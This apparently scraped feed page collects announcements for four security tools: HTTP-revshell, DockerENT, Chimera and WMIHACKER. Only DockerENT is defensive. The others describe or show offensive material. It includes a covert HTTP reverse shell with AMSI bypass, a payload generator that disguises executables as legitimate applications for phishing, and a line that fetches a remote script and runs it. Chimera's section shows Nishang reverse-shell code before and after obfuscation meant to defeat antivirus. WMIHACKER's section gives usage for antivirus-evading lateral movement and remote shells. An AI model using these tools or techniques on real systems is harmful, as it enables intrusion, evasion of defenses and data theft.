HTTP-revshell is a tool focused on redteam exercises and pentesters. This tool provides a reverse connection through the http/s protocol. It use a covert channel to gain control over the victim machine through web requests and thus evade solutions such as IDS, IPS and AV.

Help server.py (unisession server)
Server usage:
usage: server.py [-h] [--ssl] [--autocomplete] host port

Process some integers.

positional arguments:
host Listen Host
port Listen Port

optional arguments:
-h, --help show this help message and exit
--ssl Send traffic over ssl
--autocomplete Autocomplete powershell functions

Help Invoke-WebRev.ps1 (client)
Client usage:
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]

Installation
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt

Quick start server-multisession.py (multisession server)
This server allows multiple connection of clients.
There is a menu with three basic commands: sessions, interact and exit
- sessions --> show currently active sessions
- interact --> interacts with a session (Example: interact <session_id>)
- exit --> close the application
IMPORTANT: To change the session press CTRL+d to exit the current session without closing it.

Features
  • SSL
  • Proxy Aware
  • Upload Function
  • Download Function
  • Error Control
  • AMSI bypass
  • Multiple sessions [only server-multisession.py]
  • Autocomplete PowerShell functions (optional) [only server.py]

Extra functions usage

Upload
  • upload /src/path/file C:\dest\path\file

Download
  • download C:\src\path\file /dst/path/file

Help Revshell-Generator.ps1 (Automatic Payload Generator)
This script allows you to create an executable file with the payload necessary to use HTTP-revshell, you just need to follow the instructions on the screen to generate it. There are 6 predefined templates and a customizable one, with the data that you like.
The payloads generated by the tool, incorporate the legitimate icon of the application, as well as the product and copyright information of the original application. In addition, each of them opens the original application before establishing the connection with the server, pretending to be a legitimate application. This can be used for phishing or Red Team exercises.
Payload Generator usage:
iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/Revshell-Generator.ps1 | iex

IMPORTANT: All fields in predefined templates are auto-complete by pressing the enter key.

Credits


DockerENT - The Only Open-Source Tool To Analyze Vulnerabilities And Configuration Issues With Running Docker Container(S) And Docker Networks

$
0
0

DockerENT is activE ruNtime application security scanning Tool (RAST tool) and framework which is pluggable and written in python. It comes with a CLI application and clean Web Interface written with StreamLit.
DockerENT has been designed keeping in mind that during deployments there weak configurations which may get sticky in production deployments as well and can lead to severe consequences. This application connects with running containers in the system and fetches the list of weak and vulnerable runtime configurations and generates a report. If invoked through CLI it can create JSON and HTML report. If invoked through web interface, it can display the scan and audit report in the UI itself.

How to Run

TL;DR
In hurry to test this? Download the latest stable REL from PyPi and run the Web App, everything else is intuitive.
pip install DockerENT
Then run the application like:
DockerENT -w
Thats it.

Run the latest master
DockerENT has been designed to keep simplicity and usability in mind. Currently you just have to clone the repository and download dependencies. Once the dependencies are installed in local system we are good to run the tool and analyse the runtime configurations for running containers.
# Download and setup
git clone https://github.com/r0hi7/DockerENT.git
cd DockerENT
make venv
source venv/bin/activate

# Run
python -m DockerENT --help
usage: Find the vulnerabilities hidden in your running container(s).
[-h] [-d [DOCKER_CONTAINER]] [-p [DOCKER_PLUGINS]]
[-d-nw [DOCKER_NETWORK]] [-p-nw [DOCKER_NW_PLUGINS]] [-w]
[-n [PROCESS_COUNT]] [-a] [-o [OUTPUT]]

optional arguments:
-h, --help show this help message and exit
-w, --web-app Run DockerENT in WebApp mode. If this parameter is
enabled, other command line flags will be ignored.
-n [PROCESS_COUNT], --process [PROCESS_COUNT]
Run sca ns in parallel (Process pool count).
-a, --audit Flag to check weather to audit results or not.

-d [DOCKER_CONTAINER], --docker [DOCKER_CONTAINER]
Run scan against the running container.
-p [DOCKER_PLUGINS], --plugins [DOCKER_PLUGINS]
Run scan with only specified plugins.
-p-nw [DOCKER_NW_PLUGINS], --nw-plugins [DOCKER_NW_PLUGINS]
Run scan with only specified plugins.

-d-nw [DOCKER_NETWORK], --docker-network [DOCKER_NETWORK]
Run scan against running docker-network.

-o [OUTPUT], --output [OUTPUT]
Output plugin to write data to.
See this quick video to get started with.

Features
  • Plugin driven framework.
  • Use low level docker api to interact with running containers.
  • Clean and Easy to Use UI.
  • Comes with 9 docker scan plugins out of which, 6 plugins can audit results.
  • Framework ready to work docker-networks.
  • Output plugins can write to file and html sinks.
  • The only open source interactive docker scanning tool.
  • Can run plugins in parallel.
  • Under active development .

How to Create your own Plugin.
  • Have some idea to perform runtime scan.
  • Copy the same file to create your demo plugin.
cp DockerENT/docker_plugins/docker_sample_plugin.py DockerENT/docker_plugins/docker_demo_plugin.py
  • Just make sure, you maintain following structure.
_plugin_name = 'demo_plugin'

def scan(container, output_queue, audit=False, audit_queue=None):
_log.info('Staring {} Plugin ...'.format(_plugin_name_))

res = {}

result = {
'test_class': {
'TEST_NAME': ['good']
}
}

res[container.short_id] = {
_plugin_name_: result
}

# Do something magical.

_log.info('Completed execution of {} Plugin.'.format(_plugin_name_))

'''Make Sure you put dict of following structure in Q.
{
'contiainer_id': {
'plugin_name': {
'test_name_demo1': {
resultss:[]
},
'test_name_demo2': {
results: []
}
}
}
}
'''
output_queue.put(res)

if audit:
_audit(co ntainer, res, audit_queue)

def _audit(container, results, audit_queue):
'''Make Sure to add dict of following structure to Audit Q
res = {
"container_id": [
"_plugin_name_, WARN/INFO/ERROR, details"
]
}
'''
# Magical logic to perform Audit.
audit_queue.put(res)
  • Thats it. Still confused, Explain me the idea in Issues and will review and help you out, or we may end up working on it together.
  • This plugin will automatically come to drop down in UI. Easy right.
  • Sit back and eval results.

Plugins Features:
Plugin NamePlugin FileFeatureAudit
CMD_HISTORYFileIdentify shell historyRoot history and User shell history
FILESYSTEMFileIdentify RW File SystemsIf RW file systems are present.
NETWORKFileIdentify Network stateIdentifies All mapped ports.
PLAINTEST_PASSWORDFileIdentify password in different files
SECURITY_PROFILESFileIdentify Weak Security ProfilesList Weak security profiles.
USER_INFOFileIdentify user infoList permissions in passwd and other sensitive files
SYSTEM_INFOFileIdentify docker system infoNo Audit
FILES_INFOFileIdentify world writeable directories and filesList all such files.

CLI interface

Pros
  • Rich Logging interface, can help in easy debugging through extensive debug logs.
  • Can run in parallel, just pass -n <count>, to specify the processors in parallel.
  • Can dump output in JSON and HTML file.

Cons
  • Audit output is not dumped to file.
  • Selecting multiple specific dockers is pain.

UI Interface

Pros
  • Clean, and easy to use UI.
  • Everything at one single page.
  • Ease of selecting multilpe docker images, multilpe plugins and multilpe docker-networks.
  • Audit report present.

Cons
  • Logging interface not Rich.
  • JSON reports are bulky.
  • Rely on third party lib StreamLit, all issues with framework are inherent.

Help Make this tool better
  • Create a PR, Issues are more than welcome.
  • Try it, test it and enhance it.


Chimera - PowerShell Obfuscation Script Designed To Bypass AMSI And Commercial Antivirus Solutions

$
0
0

Chimera is a (shiny and very hack-ish) PowerShellobfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.

Chimera was created for this write-up and is further evidence of how trivial it is to bypass detection signatures. Hopefully, this repository will inspire someone to build something robust and more reliable.

How Chimera works...
Below is a snippet of Nishang's Invoke-PowerShellTcp.ps1, found at nishang/Shells. VirusTotal reports 25 detections of the PS1 script.
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}

#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)

#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)


And here it is again, after Chimera. VirusTotal reports 0 detections of the obfuscated version.
  # Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star.
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
# As the station slowly moves into position to obliterate the Rebels, the pilots maneuver down a narrow trench along the station’s equator, where the thermal port lies hidden.
[bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
# Darth Vader leads the counterattack himself and destroys many of the Rebels, including Luke’s boyhood friend Biggs, in ship-to-ship combat.

# Finally, it is up to Luke himself to make a run at the target, and he is saved from Vader at the last minute by Han Solo, who returns in the nick of time and sends Vader spinning away from the station.
# Heeding B en’s disembodied voice, Luke switches off his computer and uses the Force to guide his aim.
# Against all odds, Luke succeeds and destroys the Death Star, dealing a major defeat to the Empire and setting himself on the path to becoming a Jedi Knight.
$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`nCoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
# Far off in a distant galaxy, the starship belonging to Princess Leia, a young member of the Imperial Senate, is intercepted in the course of a secret mission by a massive Imperial Star Destroyer.
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
# An imperial boarding party blasts its way onto the captured vessel, and after a fierce firefight the crew of Leia’s ship is subdued.


Chimera does several things to obfuscate the source. The transformer function will separate strings into multiple pieces and reconstruct them as new variables.
For example, it will take a string like ... New-Object System.Net.Sockets.TCPClient ... and convert it to:
$a = "Syste"
$b = "m.Net.Soc"
$c = "kets.TCP"
$d = "Client"

... New-Object $a$b$c$d ...
The function separates commonly flagged data types and strings into several chunks. It defines the chunks and concatenates them at the top of the script. A higher --level will result in smaller chunks and more variables.
$CNiJfmZzzQrqZzqKqueOBcUVzmkVbllcEqjrbcaYzTMMd = "`m"
$quiyjqGdhQZgYFRdKpDGGyWNlAjvPCxQTTbmFkvTmyB = "t`Rea"
$JKflrRllAqgRlHQIUzOoyOUEqVuVrqqCKdua = "Get`s"
$GdavWoszHwDVJmpYwqEweQsIAz = "ti`ON"
$xcDWTDlvcJfvDZCasdTnWGvMXkRBKOCGEANJpUXDyjPob = "`L`O`Ca"
$zvlOGdEJVsPNBDwfKFWpvFYvlgJXDvIUgTnQ = "`Get`-"
$kvfTogUXUxMfCoxBikPwWgwHrvNOwjoBxxto = "`i"
$tJdNeNXdANBemQKeUjylmlObtYp = "`AsC`i"
$mhtAtRrydLlYBttEnvxuWkAQPTjvtFPwO = "`G"
$PXIuUKzhMNDUYGZKqftvpAiQ = "t`R`iN

Usage
Clone the repository. Tested in Kali v2020.3.
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help
Basic usage.
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p
Review the usage guide and write-up for more examples and screenshots.

Shells
In the shells/ directory are several Nishang scripts and a few generic ones. All have been tested and should work fine. But there's no telling how untested scripts will reproduce with Chimera...
Change the hardcoded IP addresses.
sed -i 's/192.168.56.101/<YOUR-IP-ADDRESS>/g' shells/*.ps1
ls -laR shells/

shells/:
total 60
-rwxrwx--- 1 tokyoneon tokyoneon 1727 Aug 29 22:02 generic1.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 1433 Aug 29 22:02 generic2.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 734 Aug 29 22:02 generic3.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 4170 Aug 29 22:02 Invoke-PowerShellIcmp.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 281 Aug 29 22:02 Invoke-PowerShellTcpOneLine.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 4404 Aug 29 22:02 Invoke-PowerShellTcp.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 594 Aug 29 22:02 Invoke-PowerShellUdpOneLine.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 5754 Aug 29 22:02 Invoke-PowerShellUdp.ps1
drwxrwx--- 1 tokyoneon tokyoneon 4096 Aug 28 23:27 misc
-rwxrwx--- 1 tokyoneon tokyoneon 616 Aug 29 22:02 powershell_reverse_shell.ps1

shells/misc:
total 36
-rwxrwx--- 1 tokyoneon tokyoneon 1757 Aug 12 19:53 Add-RegBackdoor.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 3648 Aug 12 19:53 Get-Informat ion.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 672 Aug 12 19:53 Get-WLAN-Keys.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 4430 Aug 28 23:31 Invoke-PortScan.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 6762 Aug 29 00:27 Invoke-PoshRatHttp.ps1

Resources


WMIHACKER - A Bypass Anti-virus Software Lateral Movement Command Execution Tool

$
0
0

中文版(Chinese version)
Disclaimer: The technology involved in this project is only for security learning and defense purposes, illegal use is prohibited!
Bypass anti-virus software lateral movement command execution test tool(No need 445 Port)
Introduction: The common WMIEXEC, PSEXEC tool execution command is to create a service or call Win32_Process.create, these methods have been intercepted by Anti-virus software 100%, so we created WMIHACKER (Bypass anti-virus software lateral movement command execution test tool(No need 445 Port)).
Main functions: 1. Command execution; 2. File upload; 3. File download



How to use
C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs

__ ____ __ _____ _ _ _____ _ ________ _____
\ \ / / \/ |_ _| | | | | /\ / ____| |/ / ____| __ \
\ \ /\ / /| \ / | | | | |__| | / \ | | | ' /| |__ | |__) |
\ \/ \/ / | |\/| | | | | __ | / /\ \| | | < | __| | _ /
\ /\ / | | | |_| |_ | | | |/ ____ \ |____| . \| |____| | \ \
\/ \/ |_| |_|_____| |_| |_/_/ \_\_____|_|\_\______|_| \_\
v0.6beta By. Xiangshan@360RedTeam
Usage:
WMIHACKER.vbs /cmd host user pass command GETRES?

WMIHACKER.vbs /shell host user pass

WMIHACKER.vbs /upload host user pass localpath remotepath

WMIHACKER.vbs /download host user pass localpath remotepath

/cmd single command mode
host hostname or I P address
GETRES? Res Need Or Not, Use 1 Or 0
command the command to run on remote host
The result is displayed after the command is executed
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1
No results are displayed after the command is executed
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0
shell mode
> cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!"
File upload: copy the local calc.exe to the remote host c:\calc.exe
> cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"
File download: Download the remote host calc.exe to the local c:\calc.exe
> cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"


Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>